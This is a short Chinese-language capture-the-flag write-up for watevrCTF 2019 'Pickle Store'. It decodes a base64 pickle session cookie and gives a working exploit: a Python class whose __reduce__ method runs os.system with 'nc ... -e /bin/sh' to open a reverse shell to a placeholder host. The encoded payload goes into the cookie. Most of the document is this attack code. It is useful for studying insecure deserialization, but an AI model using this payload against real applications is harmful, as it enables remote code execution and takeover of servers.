[watevrCTF 2019]Pickle Store
观察cookie
使用pickle.loads()
和base64对这串字符进行解码反序列化
import pickle
import base64
c = pickle.loads(base64.b64decode("gAN9cQAoWAUAAABtb25leXEBTfQBWAcAAABoaXN0b3J5cQJdcQNYEAAAAGFudGlfdGFtcGVyX2htYWNxBFggAAAAYWExYmE0ZGU1NTA0OGNmMjBlMGE3YTYzYjdmOGViNjJxBXUu"))
print(c)
# {'money': 500, 'history': [], 'anti_tamper_hmac': 'aa1ba4de55048cf20e0a7a63b7f8eb62'}
得到具体信息,因此猜测后端是读取session进行pickle反序列化
pickle反序列化
EXP:
import base64
import pickle
class A(object):
def __reduce__(self):
return (eval, ("__import__('os').system('nc XXXXXXXX 2333 -e/bin/sh')",))
a = A()
print(base64.b64encode(pickle.dumps(a)))
将生成的字符串写进cookie里面,刷新网页即可反弹shell